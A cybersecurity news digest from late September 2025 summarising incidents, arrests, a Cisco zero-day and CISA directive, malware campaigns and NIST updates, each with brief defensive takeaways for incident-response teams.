CISA shares lessons learned from a recent federal IR engagement — CISA summarized containment, forensics, and recovery pitfalls observed during a real engagement to help teams harden playbooks (23-09-2025) [US]. Practical takeaways include early log preservation, rigorous account/credential review, and verifying egress controls before restore. (Source: CISA, 23-09-2025).

Microsoft tracks an updated XCSSET strain abusing Xcode projects — New activity shows macOS-targeting XCSSET evolving its developer-project infection chain, relevant for DFIR triage on Apple endpoints (24-09-2025) [Global]. Review build servers and Xcode project artifacts for rogue scripts and post-build steps. (Source: Microsoft Security Blog, 24-09-2025).

BRICKSTORM espionage campaign: stealthy backdoor for persistence — Google/Mandiant detail intrusions since March 2025 across legal/SaaS/BPO/tech sectors using a quiet backdoor to retain access (24-09-2025) [US]. DFIR teams should hunt for long-lived C2 beacons and unusual scheduled tasks to root out persistence. (Source: Google Threat Intelligence, 24-09-2025).

NCA arrests suspect tied to Collins Aerospace software attack affecting airports — A man in his 40s was arrested in West Sussex after check-in/boarding systems disruption at Heathrow, Brussels, Berlin and others (24-09-2025) [UK/EU]. Investigators are probing links to a broader ransomware/extortion operation. (Source: UK NCA, 24-09-2025).

INTERPOL operation across 14 African countries nets 260 suspects — Arrests targeted romance scams and sextortion rings, with ~$2.8M in losses across 1,400+ victims (26-09-2025) [Africa]. Highlights the cross-border nature of digital coercion and the need for platform evidence preservation. (Source: AP News, 26-09-2025).

Harrods notifies customers after third-party breach exposes contact data — Names and contact details were accessed at a service provider; payment data/passwords not impacted per statements (26-09-2025) [UK]. Retailers should reassess supplier data segregation and incident comms runbooks. (Source: The Guardian, 26-09-2025).

RTX confirms ransomware in passenger boarding software incident — Parent of Collins Aerospace said the event won’t materially impact results; disruptions hit airport ops over the weekend (26-09-2025) [US/EU]. Reinforces vendor risk around aviation ground-IT. (Source: Cybersecurity Dive, 26-09-2025).

Cisco SNMP stack overflow (CVE-2025-20352) actively exploited — Affected IOS/IOS-XE builds allow DoS and, with high privileges, code execution; patches released in the semiannual bundle (24-09-2025) [Global]. Prioritize SNMP hardening and software updates on network edge devices. (Source: Cisco PSIRT, 24-09-2025).

CISA directs federal agencies to hunt for compromise on Cisco devices — US agencies must inventory devices, collect forensics, disconnect end-of-support units, and upgrade by deadlines (25-09-2025) [US]. Private sector can adapt the checklist to accelerate detection at scale. (Source: CISA Alert, 25-09-2025).

NCSC/industry flag RayInitiator & LINE VIPER malware on Cisco firewalls — Analysis links zero-day exploitation to custom bootkits/loaders impacting ASA/secure boot conditions (26-09-2025) [UK/Global]. Network teams should verify secure boot status and monitor for anomalous boot artifacts. (Source: Unit 42 summary of NCSC analysis, 26-09-2025).

UK arrest linked to airport disruption investigation — Following widespread airport IT outages, the NCA detained a suspect on Computer Misuse grounds; inquiries continue (24-09-2025) [UK/EU]. Case underscores aviation sector dependencies on third-party software. (Source: Cybersecurity Dive, 24-09-2025).

INTERPOL sweep: 260 arrests in romance-sextortion scams — Coordinated operations across 14 countries targeted online coercion and financial extortion (26-09-2025) [Africa]. Cross-border cooperation remains pivotal for evidence and takedowns. (Source: AP News, 26-09-2025).

CISA issues Emergency Directive on Cisco zero-day exposure — Federal agencies must inventory, collect evidence, disconnect EoS devices and upgrade by set deadlines (25-09-2025) [US]. ED elevates urgency for enterprises to mirror actions on similar fleets. (Source: CISA News, 25-09-2025).

UK “Cyber Growth Action Plan – Final Report” released — Report recommends expanding and resourcing the NCSC to drive resilience and growth outcomes (19-09-2025) [UK]. Signals continued UK focus on national cyber capacity-building. (Source: UK Government, 19-09-2025).

NIST SP 800-53 Release 5.2.0 update (planning note 27-08-2025) — Minor release updates SP 800-53/53A; organizations should review control changes for ripple effects on overlays/baselines (27-08-2025) [US]. (Source: NIST CSRC, 27-08-2025).

NIST NCCoE: Draft white paper maps PQC migration to risk frameworks — CSWP-48 (initial public draft) aligns PQC migration capabilities with NIST risk docs; comments due Oct 20 (18-09-2025) [US]. (Source: NIST CSRC News, 18-09-2025).